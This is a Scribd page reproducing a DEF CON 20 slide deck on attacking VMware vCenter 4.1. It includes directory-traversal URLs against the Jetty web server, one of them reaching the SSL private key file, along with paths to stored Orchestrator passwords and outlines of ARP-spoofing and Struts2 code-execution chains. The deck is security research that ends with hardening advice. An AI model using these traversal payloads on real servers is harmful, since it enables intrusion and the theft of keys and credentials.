100% found this document useful (2 votes)

209 views32 pages

DEFCON 20 Minozhenko Hack VMware 60 Seconds PDF

The document describes how an attacker could hack a VMware vCenter server in 60 seconds by exploiting multiple vulnerabilities. The attacker is able to steal passwords and SSL keys by exploiting directory traversal bugs in the Jetty web server. They can then decrypt traffic and access administrator accounts. The VMware vCenter Orchestrator is also vulnerable, storing passwords in plain text files that can be easily cracked.

Uploaded by

Rei Chel

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

100% found this document useful (2 votes)

209 views32 pages

DEFCON 20 Minozhenko Hack VMware 60 Seconds PDF

Uploaded by

Rei Chel

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 32

Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds

Alexander Minozhenko

#whoami

Pen-tester at Digital Security

Researcher DCG#7812 / Zeronights CTF Thanks for ideas and support to Alexey Sintsov
2

What do pen-testers do?

Scanning Fingerprinting Banner grabbing Play with passwords Find vulns. Exploit vulns. Escalate privs. Dig in Find ways to make attacks And e.t.c.
3

Find vulns.
Static
Source code review
regexp formal methods hand testing

Reverse Engineering
formal methods hands

Dynamic
Fuzzing (bin/web) + Typical bugs for class + Reverse Engineering Hand testing

Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit-db/etc)

Pen-tester env.

Tasks:
pwn target 8) show most dang. vulns. show real attacks and what an attacker can do

Time: Not much ) Targets: Large number of targets, different types

Find vulns.
Static
Source code review
regexp formal methods hand testing

BlackBox
Not much time

Reverse Engineering
formal methods hands

Dynamic
Fuzzing (bin/web) + Typical bugs for class + Reverse Engineering Hand testing

Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit-db/etc)

Target

VMware vCenter Server

VMware vCenter Server is solution to manage VMware vSphere vSphere virtualization operating system

Target

Vmware vCenter version 4.1 update 1 Services:

Update Manager vCenter Orchestrator Chargeback Other

Each services has web server

CVE-2009-1523
Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../FILE Discovered by Claudio Criscione But Fixed in VMware Update Manager 4.1 update 1 :(

Directory traversal..again?
Directory traversal in Jetty web server http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..% 5C..%5C..%5C..\FILE.EXT Discovered by Alexey Sintsov Metasploit module vmware_update_manager_traversal.rb by sinn3r

Directory traversal
What file to read?
Claudio Criscione propose to read vpxd-profiler-* /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680FB72656A1DCB'/Username=FakeDomain\FakeUser'/SoapSession/Id='A D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1

Contains logs of SOAP requests with session ID

VASTO

VASTO collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions. http://vasto.nibblesec.org/ vmware_updatemanager_traversal.rb Jetty path traversal vmware_session_rider.rb Local proxy to ride stolen SOAPID sessions
13

Fixed in version 4.1 update 1, contain ip - addresses

Attack

Make arp poisoning attack Spoof ssl certificate

Attack

Administrators check SSL cert

Attack

Steal ssl key via directory traversal

http://target:9084/vci/downloads/.\..\..\..\..\..\..\..\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key

Make arp-spoofing Decrypt traffic with stolen ssl key What if arp-spoofing does not work?

Vmware vCenter Orchestrator

Vmware vCO software for automate configuration and management Install by default with vCenter Have interesting file
C:\Program files\VMware\Infrastructure\Orchestrator \configuration\jetty\etc\passwd.properties

Vmware vCenter Orchestrator

Which contains md5 password without salt Could easy bruteforce using rainbow tables

We get in

Plain text passwords

Vmware vCenter Orchestrator

vCO stored password at files:

C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\plugins\VC.xml

C:\Program Files\VMware\Infrastructure\Orchestrator\appserver\server\vmo\conf\vmo.properties

VC.xml <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <virtual-infrastructure-hosts> <virtual-infrastructure-host <enabled>true</enabled> <url>https://new-virtual-center-host:443/sdk</url> <administrator-username>vmware</administratorusername> <administratorpassword>010506275767b74786b383a4a60be76786474032 9d5fcf324ec7fc98b1e0aaeef </administrator-password> <pattern>%u</pattern> </virtual-infrastructure-host> </virtual-infrastructure-hosts>
23

Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079 vcenter

Red bytes look like length Green bytes in ASCII range Black bytes random

Algorithm password Encoding

Password Decoder

VMSA-2011-0005

VMware vCenter Orchestrator use Struts2 version 2.11 discovered by Digital Defense, Inc CVE-2010-1870 Struts2/XWork remote command execution discovered by Meder Kydyraliev Fixed in 4.2

Example exploit

Attack Vectors

Directory traversal + ARP poisoning Directory traversal + password decoding/bruteforcing Remote code execution using Struts2 bug

Hardering

Update to latest version 4.2 update 4 or 5 Filter administration service services VMware KB 2021259. VMware vSphere Security Hardering Guide

Conclusions

Password must be stored in hash with salt or encrypted Fixed bugs not always fixed in proper way Pen-tester will get more profit if he tries to research something One simple bug and we can own all infrastructure

Thank you!

[email protected] @al3xmin

AlexanderMinozhenko - AlexeySintsov. How To Hack VMware Vcenter Server in 60 Seconds
No ratings yet
AlexanderMinozhenko - AlexeySintsov. How To Hack VMware Vcenter Server in 60 Seconds
32 pages
Red Team Operations
No ratings yet
Red Team Operations
26 pages
Virtualization Security
No ratings yet
Virtualization Security
33 pages
Pentera Labs Sensitive Information Disclosure VMware Vcenter CVE 2022 22948
No ratings yet
Pentera Labs Sensitive Information Disclosure VMware Vcenter CVE 2022 22948
13 pages
Individual Report - Bhavook Kalra
No ratings yet
Individual Report - Bhavook Kalra
15 pages
Ethical Hacking Project Work
No ratings yet
Ethical Hacking Project Work
16 pages
VMware Overview of L1 Terminal Fault' (L1TF) Speculative-Execution Vulnerabilities in Intel Processors - CVE-2018-3646, CVE-2018-3620, and CVE-2018-3615 (55636)
No ratings yet
VMware Overview of L1 Terminal Fault' (L1TF) Speculative-Execution Vulnerabilities in Intel Processors - CVE-2018-3646, CVE-2018-3620, and CVE-2018-3615 (55636)
5 pages
VMware vCenter Security Alert
No ratings yet
VMware vCenter Security Alert
3 pages
Joanna Rutkowska - Security Challenges in Virtualized Environments
No ratings yet
Joanna Rutkowska - Security Challenges in Virtualized Environments
97 pages
EH Cheat Sheet
No ratings yet
EH Cheat Sheet
3 pages
Lab5 VAPT
No ratings yet
Lab5 VAPT
14 pages
Lampsec ctf6 PDF
No ratings yet
Lampsec ctf6 PDF
50 pages
Not in Deep 2. in Depth Test
No ratings yet
Not in Deep 2. in Depth Test
38 pages
Exploit Labs Short
No ratings yet
Exploit Labs Short
17 pages
Unit 2
No ratings yet
Unit 2
34 pages
Lab 8 - Setup Kali For Cybersecurity
No ratings yet
Lab 8 - Setup Kali For Cybersecurity
6 pages
Lab
No ratings yet
Lab
20 pages
Pentest Intro
No ratings yet
Pentest Intro
85 pages
Cloud Security Delivery Models: Security Risks & Recommendations
No ratings yet
Cloud Security Delivery Models: Security Risks & Recommendations
41 pages
The Ultimate Penetration Testing Methodology (2025 Edition) - VeryLazyTech
No ratings yet
The Ultimate Penetration Testing Methodology (2025 Edition) - VeryLazyTech
8 pages
Nexpose Audit Report
No ratings yet
Nexpose Audit Report
376 pages
Pentest Eproc and Apps Whitelist Non IPS WAF
No ratings yet
Pentest Eproc and Apps Whitelist Non IPS WAF
52 pages
Jonathan Brossard - Breaking Virtualization 8088 Mode - Ruxcon 2010
No ratings yet
Jonathan Brossard - Breaking Virtualization 8088 Mode - Ruxcon 2010
86 pages
Scan Eproc and APPS With Whitelist Non IPS
No ratings yet
Scan Eproc and APPS With Whitelist Non IPS
49 pages
Metasploitable2 Complete Tests
No ratings yet
Metasploitable2 Complete Tests
4 pages
Concepts of Vitualization
No ratings yet
Concepts of Vitualization
8 pages
IIS Vulnerabilities Checklist
No ratings yet
IIS Vulnerabilities Checklist
2 pages
MTech Ethical Hacking Unit 2 Lecture 5
No ratings yet
MTech Ethical Hacking Unit 2 Lecture 5
51 pages
Hitachi Security Scan Report
No ratings yet
Hitachi Security Scan Report
49 pages
PC Is Can Result 20141111
No ratings yet
PC Is Can Result 20141111
174 pages
Exploiting of Metasploit Machine Assessment Report: Assignment-3
No ratings yet
Exploiting of Metasploit Machine Assessment Report: Assignment-3
29 pages
6th Sem Lab Manual
No ratings yet
6th Sem Lab Manual
25 pages
Penetration Testing Sample Report: Virtual Hacking Labs
No ratings yet
Penetration Testing Sample Report: Virtual Hacking Labs
6 pages
Gbenga Adewale 16023455 CC6051 Ethical Hacking
No ratings yet
Gbenga Adewale 16023455 CC6051 Ethical Hacking
16 pages
Penetration Testing
No ratings yet
Penetration Testing
15 pages
Virtual Machine Security Solutions
No ratings yet
Virtual Machine Security Solutions
9 pages
Dayananda Sagar University: Special Topic-1 Report
No ratings yet
Dayananda Sagar University: Special Topic-1 Report
20 pages
Nmap Scripts for Vulnerability Detection
50% (2)
Nmap Scripts for Vulnerability Detection
12 pages
Task 1:: Run The Vmware Workstation and Click On Create A New Virtual Machine Option
No ratings yet
Task 1:: Run The Vmware Workstation and Click On Create A New Virtual Machine Option
24 pages
Virtualization Security Guide
No ratings yet
Virtualization Security Guide
5 pages
Vulnerability Digest Apr 2025
No ratings yet
Vulnerability Digest Apr 2025
16 pages
An Exploitation Chain To Breakout of VMware ESXi
No ratings yet
An Exploitation Chain To Breakout of VMware ESXi
9 pages
Inside The Mind of Network Hacker
No ratings yet
Inside The Mind of Network Hacker
28 pages
Oluwatobi 2020 Fall MISSM
No ratings yet
Oluwatobi 2020 Fall MISSM
27 pages
Network Security VAPT Checklist
No ratings yet
Network Security VAPT Checklist
7 pages
f5 Agility Labs Waf PDF
100% (2)
f5 Agility Labs Waf PDF
344 pages
Relevant TryHackMe Pentesting Report by Dorota Kozlowska 1646244313 PDF
No ratings yet
Relevant TryHackMe Pentesting Report by Dorota Kozlowska 1646244313 PDF
22 pages
Ethical Hacking Practical Guide
No ratings yet
Ethical Hacking Practical Guide
5 pages
Network Threat Hunting 202406
No ratings yet
Network Threat Hunting 202406
200 pages
BasterLord - Network Manual v2.0
No ratings yet
BasterLord - Network Manual v2.0
24 pages
Aia2 IT21270024
No ratings yet
Aia2 IT21270024
17 pages
Game of Active Directory (GOAD)
No ratings yet
Game of Active Directory (GOAD)
82 pages
Updated Project (Spring 2021) - 5
No ratings yet
Updated Project (Spring 2021) - 5
8 pages
Unit 5cc
No ratings yet
Unit 5cc
31 pages
Enumeration & Exploitation & Hardening
No ratings yet
Enumeration & Exploitation & Hardening
1 page
pt0 002 12
No ratings yet
pt0 002 12
30 pages
Entity Authentication
No ratings yet
Entity Authentication
10 pages
Cyber Security Assignment 1
No ratings yet
Cyber Security Assignment 1
5 pages
Cyber Law Course Overview
100% (2)
Cyber Law Course Overview
4 pages
Basics of Ethical Hacking Guide
No ratings yet
Basics of Ethical Hacking Guide
13 pages
Security Incident Management Process
No ratings yet
Security Incident Management Process
8 pages
Ch15 System and User Security
No ratings yet
Ch15 System and User Security
16 pages
Google Ai Red Team Digital Final
No ratings yet
Google Ai Red Team Digital Final
15 pages
Mail Spam
No ratings yet
Mail Spam
40 pages
Hanwha Camera Security Update
No ratings yet
Hanwha Camera Security Update
4 pages
Scams
No ratings yet
Scams
2 pages
Sso Id
0% (1)
Sso Id
3 pages
Ethical Hacking Guide
No ratings yet
Ethical Hacking Guide
7 pages
Kidschatgpt Problem
No ratings yet
Kidschatgpt Problem
11 pages
2017 Bad Bot Report
No ratings yet
2017 Bad Bot Report
41 pages
Written Assignment Unit 7 CS 4404
No ratings yet
Written Assignment Unit 7 CS 4404
4 pages
Security Issues in Networks With Internet Access: Presented by Sri Vallabh Aida Janciragic Sashidhar Reddy
No ratings yet
Security Issues in Networks With Internet Access: Presented by Sri Vallabh Aida Janciragic Sashidhar Reddy
37 pages
Chapter 8 Business Crimen
No ratings yet
Chapter 8 Business Crimen
3 pages
Media and Information Literacy Q2 W1
No ratings yet
Media and Information Literacy Q2 W1
12 pages
Keys Kaspersky
83% (6)
Keys Kaspersky
2 pages
CySA+ Exam Prep Guide
No ratings yet
CySA+ Exam Prep Guide
49 pages
Lesson Plan CSS2
No ratings yet
Lesson Plan CSS2
6 pages
Pen Testing
No ratings yet
Pen Testing
27 pages
Cyber Security IMP Points Short Notes
No ratings yet
Cyber Security IMP Points Short Notes
20 pages
Completion of Cyber Security Courses On IGOT Platform by All Officers-Reg.
No ratings yet
Completion of Cyber Security Courses On IGOT Platform by All Officers-Reg.
2 pages
Ipsec VPN Requirements: Configure Isakmp (Ike) - (Isakmp Phase 1)
No ratings yet
Ipsec VPN Requirements: Configure Isakmp (Ike) - (Isakmp Phase 1)
4 pages
Cybersecurity and Digital Ethics in Law
No ratings yet
Cybersecurity and Digital Ethics in Law
26 pages
Post-Quantum Cryptography Insights
No ratings yet
Post-Quantum Cryptography Insights
31 pages
Security SDLC Example Usage
No ratings yet
Security SDLC Example Usage
2 pages
Ch05 NetSec5e
No ratings yet
Ch05 NetSec5e
33 pages
7 2 Malware Behavior
No ratings yet
7 2 Malware Behavior
28 pages

DEFCON 20 Minozhenko Hack VMware 60 Seconds PDF

Uploaded by

DEFCON 20 Minozhenko Hack VMware 60 Seconds PDF

Uploaded by

Invest in security to secure investments

How to hack VMware vCenter server in 60 seconds

Pen-tester at Digital Security

What do pen-testers do?

Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit-db/etc)

Time: Not much ) Targets: Large number of targets, different types

Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit-db/etc)

VMware vCenter Server

Vmware vCenter version 4.1 update 1 Services:

Each services has web server

Contains logs of SOAP requests with session ID

Fixed in version 4.1 update 1, contain ip - addresses

Make arp poisoning attack Spoof ssl certificate

Administrators check SSL cert

Steal ssl key via directory traversal

Vmware vCenter Orchestrator

Vmware vCenter Orchestrator

Plain text passwords

Vmware vCenter Orchestrator

vCO stored password at files:

Algorithm password Encoding

You might also like